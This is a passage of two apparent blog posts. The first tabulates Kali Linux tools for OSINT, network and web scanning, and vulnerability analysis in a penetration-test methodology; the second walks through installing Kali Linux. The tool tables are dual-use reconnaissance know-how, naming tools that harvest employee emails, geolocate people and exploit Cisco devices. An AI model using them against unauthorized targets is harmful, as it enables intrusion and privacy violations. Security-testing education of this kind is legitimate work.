vulnerability analysis where the testing team synthesizes all the
information gathered in part 1 of discovery to identify vulnerabilities
and possible attack vectors. The discovery phase is one of the most
important phases that can and should be repeated as the penetration test
progresses into the Attack phase.<br />
<h3>
Information Gathering and Scanning</h3>
Kali contains many tools that can be used for information gathering
and open-source intelligence gathering (OSINT). Here is a quick
breakdown of the tools.<br />
<table border="1" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><em><strong>Tool/Capability</strong></em></span><br />
</td>
<td>
<span style="color: #f58220;"><em><strong>Description</strong></em></span><br />
</td>
</tr>
<tr>
<td>
Maltego<br />
</td>
<td>
Maltego is an open-source intelligence and forensics application
developed by Paterva. Maltego focuses on providing a library of
transforms for discovery of data from open sources, and visualizing that
information in a graph format, suitable for link analysis and data
mining.<br />
</td>
</tr>
<tr>
<td>
TheHarvester<br />
</td>
<td>
The objective of this program is to gather emails, subdomains, hosts,
employee names, open ports and banners from different public sources
like search engines, PGP key servers and SHODAN computer database.<br />
</td>
</tr>
<tr>
<td>
Creepy<br />
</td>
<td>
Creepy is a geolocation tool that helps social engineers perform successful information gathering.<br />
</td>
</tr>
<tr>
<td>
Dmitry<br />
</td>
<td>
Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command
Line Application coded in C. Dmitry is used to gather information such
as sub-domains, email addresses, whois lookups,etc.<br />
</td>
</tr>
<tr>
<td>
Jigsaw<br />
</td>
<td>
Email enumeration tool that accesses the Jigsaw business directory.
Can also be used to generate email addresses using common formats.<br />
</td>
</tr>
<tr>
<td>
Metagoofil<br />
</td>
<td>
Information gathering tool designed for extracting metadata of public
documents (pdf,doc,xls,ppt,docx,pptx,xlsx) belonging to a target
company.<br />
</td>
</tr>
</tbody>
</table>
<br />
<br />
Kali has many tools we could use to meet various scanning requirements. Here is a quick table broken out by requirement type.<br />
<table border="1" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><strong><em>Technique</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Tool/Capability</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Description</em></strong></span><br />
</td>
</tr>
<tr>
<td rowspan="3">
Network Discovery<br />
</td>
<td>
Fierce.pl<br />
</td>
<td>
DNS interrogation tool. Uses several techniques including DNS zone transfers, DNS brute-force, and DNS reverse lookups.<br />
</td>
</tr>
<tr>
<td>
dnsdict6<br />
</td>
<td>
Utility used to enumerate IPv6 domains.<br />
</td>
</tr>
<tr>
<td>
Fping/fping6<br />
</td>
<td>
Ping on steroids. Has the ability to query systems via ICMP.<br />
</td>
</tr>
<tr>
<td rowspan="3">
Network Port and Service Identification<br />
</td>
<td>
dnmap<br />
</td>
<td>
Distributed nmap framework with client and server components. Map hosts, ports, and services across networks.<br />
</td>
</tr>
<tr>
<td>
nmap<br />
</td>
<td>
Map hosts, ports, and services across networks. Also, has ability to run scripts to identify vulnerabilities.<br />
</td>
</tr>
<tr>
<td>
hping3<br />
</td>
<td>
Hping3 is a network tool able to send custom TCP/IP packets and to
display target replies like ping program does with ICMP replies.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Wireless Discovery / Scanning<br />
</td>
<td>
Kismet<br />
</td>
<td>
A 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.<br />
</td>
</tr>
<tr>
<td>
Wireshark<br />
</td>
<td>
A network protocol analyzer for Unix and Windows.<br />
</td>
</tr>
<tr>
<td rowspan="3">
Web Application Discovery / Scanning<br />
</td>
<td>
Burpsuite<br />
</td>
<td>
An integrated platform for performing security testing of web applications.<br />
</td>
</tr>
<tr>
<td>
Webscarab<br />
</td>
<td>
A framework for analysing applications that communicate using the HTTP and HTTPS<br />
</td>
</tr>
<tr>
<td>
Nikto<br />
</td>
<td>
An Open Source (GPL) web server scanner which performs comprehensive tests against web servers<br />
</td>
</tr>
</tbody>
</table>
<br />
<h3>
Vulnerability Analysis</h3>
During vulnerability analysis we review information gathering and
scanning data to identify possible attack vectors. Typically, this
involves reviewing service and OS version information against online
vulnerability databases. We can also identify vulnerabilities through
automated tools provided by Kali.<br />
We've included a table of these tools below. Please note that we did
include additional tools that could be installed. Keep in mind that Kali
is Linux and most things that can be installed on a Linux platform will
install on Kali. It's not unusual for us to install Nessus right after
installing Kali on our primary penetration testing systems.<br />
<table border="1" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><strong><em>Technique</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Tool/Capability</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Description</em></strong></span><br />
</td>
</tr>
<tr>
<td rowspan="3">
Vulnerability Scanning<br />
</td>
<td>
Nmap -sC or –script<br />
</td>
<td>
Switches used to initiate vulnerbility scanning with nmap.<br />
</td>
</tr>
<tr>
<td>
OpenVAS<br />
</td>
<td>
Open-source vulnerability scanner. A fork of the Nessus project.<br />
</td>
</tr>
<tr>
<td>
*Nessus<br />
</td>
<td>
Commercial vulnerability scanner.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Database Vulnerability Scanning<br />
</td>
<td>
oscanner<br />
</td>
<td>
An Oracle assessment framework developed in Java.<br />
</td>
</tr>
<tr>
<td>
Tnscmd10g<br />
</td>
<td>
Tool used to gather information from the TNS listener port.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Network Vulnerability Scanning<br />
</td>
<td>
Cisco-global-exploiter<br />
</td>
<td>
Is an advanced, simple and fast security testing tool/ exploit
engine, that is able to exploit 14 vulnerabilities in disparate Cisco
devices.<br />
</td>
</tr>
<tr>
<td>
Yersinia<br />
</td>
<td>
Is a network tool designed to take advantage of some weakeness in different network protocols.<br />
</td>
</tr>
<tr>
<td rowspan="3">
Web Vulnerability Scanning<br />
</td>
<td>
Arachni<br />
</td>
<td>
A Free/Open Source Web Application Security Scanner Framework.<br />
</td>
</tr>
<tr>
<td>
W3af<br />
</td>
<td>
Is a Web Application Attack and Audit Framework.<br />
</td>
</tr>
<tr>
<td>
Owasp-zap<br />
</td>
<td>
The Zed Attack Proxy (ZAP) is an easy to use integrated penetration
testing tool for finding vulnerabilities in web applications.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Fuzzing Tools<br />
</td>
<td>
bed<br />
</td>
<td>
BED (aka Bruteforce Exploit Detector) is a plain-text protocol fuzzer
that checks software for common vulnerabilities like buffer overflows,
format string bugs, integer overflows, etc.<br />
</td>
</tr>
<tr>
<td>
spike<br />
</td>
<td>
API for fuzzer development written in C.<br />
</td>
</tr>
</tbody>
</table>
<br />
That's it for today! will share the next part of methodology soon..stay tuned for updates..<br />
<br /><br />
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com5tag:blogger.com,1999:blog-4509349481580895365.post-29326564883674306032015-08-27T09:50:00.000+05:302015-08-27T09:50:10.346+05:30Kali Linux Installation Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi Friends ,<br />
<br />
The following tutorial will guide you to Install kali linux in your machine :<br />
<br />
<h1 class="page-title">
Kali Linux Hard Disk Install:</h1>
<h2>
Kali Linux Installation Requirements</h2>
<div style="text-align: justify;">
Installing Kali Linux on your computer
is an easy process. First, you’ll need compatible computer hardware.
Kali is supported on i386, amd64, and ARM (both armel and armhf)
platforms. The hardware requirements are minimal as listed below,
although better hardware will naturally provide better performance. The
i386 images have a default <a href="http://en.wikipedia.org/wiki/Physical_Address_Extension" target="_blank" title="Physical Address Extension">PAE</a> kernel, so you can run them on systems with over 4GB of RAM. <a href="http://docs.kali.org/introduction/download-official-kali-linux-images" target="_blank" title="Download Official Kali Images">Download Kali Linux</a> and either burn the ISO to DVD, or<a href="http://docs.kali.org/downloading/kali-linux-live-usb-install" target="_blank" title="Kali Linux Live USB Install"> prepare a USB stick with Kali Linux Live</a> as the installation medium. If you do not have a DVD drive or USB port on your computer, check out the <a href="http://docs.kali.org/installation/kali-linux-network-pxe-install" target="_blank" title="Kali Linux Network PXE Install">Kali Linux Network Install</a>.</div>
<h4>
Installation Prerequisites</h4>
<ul>
<li style="text-align: justify;">A minimum of 10 GB disk space for the Kali Linux install.</li>
<li style="text-align: justify;">For i386 and amd64 architectures, a minimum of 512MB RAM.</li>
<li>CD-DVD Drive / USB boot support</li>
</ul>
<h3>
Preparing for the Installation</h3>
<ol>
<li><a href="http://docs.kali.org/introduction/download-official-kali-linux-images" target="_blank" title="Download Official Kali Images">Download Kali linux</a>.</li>
<li>Burn The Kali Linux ISO to DVD or <a href="http://docs.kali.org/downloading/kali-linux-live-usb-install" target="_blank" title="Kali Linux Live USB Install">Image Kali Linux Live to USB</a>.</li>
<li>Ensure that your computer is set to boot from CD / USB in your BIOS.</li>
</ol>
<h3>
Kali Linux Installation Procedure</h3>
<ol>
<li>To start your installation, boot with your chosen installation
medium. You should be greeted with the Kali Boot screen. Choose either <em>Graphical</em> or <em>Text-Mode</em> install. In this example, we chose a GUI install. <br clear="none" /> <br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/01-install-select.png"><img alt="01-install-select" class="alignnone size-full wp-image-5762" height="482" src="http://docs.kali.org/wp-content/uploads/2015/02/01-install-select.png" width="642" /></a></li>
<li>Select your preferred language and then your country location.
You’ll also be prompted to configure your keyboard with the appropriate
keymap. <br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/02-language-select.png"><img alt="02-language-select" class="alignnone wp-image-5763 size-full" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/02-language-select.png" width="800" /></a></li>
<li>Specify your geographic location.<br />
<a href="http://docs.kali.org/wp-content/uploads/2015/02/03-location.png"><img alt="03-location" class="alignnone size-full wp-image-5764" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/03-location.png" width="800" /></a></li>
<li>The installer will copy the image to your hard disk, probe your
network interfaces, and then prompt you to enter a hostname for your
system. In the example below, we’ve entered “kali” as our hostname. <br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/05-hostname.png"><img alt="05-hostname" class="alignnone wp-image-5765 size-full" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/05-hostname.png" width="800" /></a></li>
<li>You may optionally provide a default domain name for this system to use. <br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/06-domain.png"><img alt="06-domain" class="alignnone size-full wp-image-5766" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/06-domain.png" width="800" /></a></li>
<li>Next, provide a full name for a non-root user for the system.<br />
<a href="http://docs.kali.org/wp-content/uploads/2015/02/07-user.png"><img alt="07-user" class="alignnone size-full wp-image-5767" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/07-user.png" width="800" /></a></li>
<li>A default user ID will be created, based on the full name you provided. You can change this if you like.<br />
<a href="http://docs.kali.org/wp-content/uploads/2015/02/08-username.png"><img alt="08-username" class="alignnone size-full wp-image-5768" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/08-username.png" width="800" /></a></li>
<li>Next, set your time zone.<br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/09-timezone.png"><img alt="09-timezone" class="alignnone size-full wp-image-5769" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/09-timezone.png" width="800" /></a></li>
<li>The installer will now probe your disks and offer you four choices.
In our example, we’re using the entire disk on our computer and not
configuring LVM (logical volume manager). Experienced users can use the
“Manual” partitioning method for more granular configuration options.<br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/10-partitionmethod.png"><img alt="10-partitionmethod" class="alignnone size-full wp-image-5770" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/10-partitionmethod.png" width="800" /></a></li>
<li>Select the disk to be partitioned.
<a href="http://docs.kali.org/wp-content/uploads/2015/02/11-selectdisk.png"><img alt="11-selectdisk" class="alignnone size-full wp-image-5771" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/11-selectdisk.png" width="800" /></a></li>
<li>Depending on your needs, you can choose to keep all your files in a
single partition — the default — or to have separate partitions for one
or more of the top-level directories. If you’re not sure which you want,
you want “All files in one partition”.
<a href="http://docs.kali.org/wp-content/uploads/2015/02/12-partitioningscheme.png"><img alt="12-partitioningscheme" class="alignnone size-full wp-image-5772" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/12-partitioningscheme.png" width="800" /></a></li>
<li>Next, you’ll have one last chance to review your disk configuration
before the installer makes irreversible changes. After you click <em>Continue</em>, the installer will go to work and you’ll have an almost finished installation.<br />
<br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/13-finish-partitioning.png"><img alt="13-finish-partitioning" class="alignnone size-full wp-image-5773" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/13-finish-partitioning.png" width="800" /></a></li>
<li>Configure network mirrors. Kali uses a central repository to
distribute applications. You’ll need to enter any appropriate proxy
information as needed.<br />
<br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/14-networkmirror.png"><img alt="14-networkmirror" class="alignnone size-full wp-image-5774" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/14-networkmirror.png" width="800" /></a><br clear="none" /><div class="st-alert st-alert- ">
<div style="text-align: justify;">
<strong>NOTE!</strong> If you select “NO” in this screen, you will <strong>NOT</strong> be able to install packages from Kali repositories.</div>
</div>
</li>
<li>Next, install GRUB.
<a href="http://docs.kali.org/wp-content/uploads/2015/02/15-install-grub.png"><img alt="15-install-grub" class="alignnone size-full wp-image-5775" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/15-install-grub.png" width="800" /></a></li>
<li>Finally, click Continue to reboot into your new Kali installation.<br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/16-install-complete.png"><img alt="16-install-complete" class="alignnone size-full wp-image-5776" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/16-install-complete.png" width="800" /></a></li>
</ol>
<h1 class="page-title">
</h1>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com3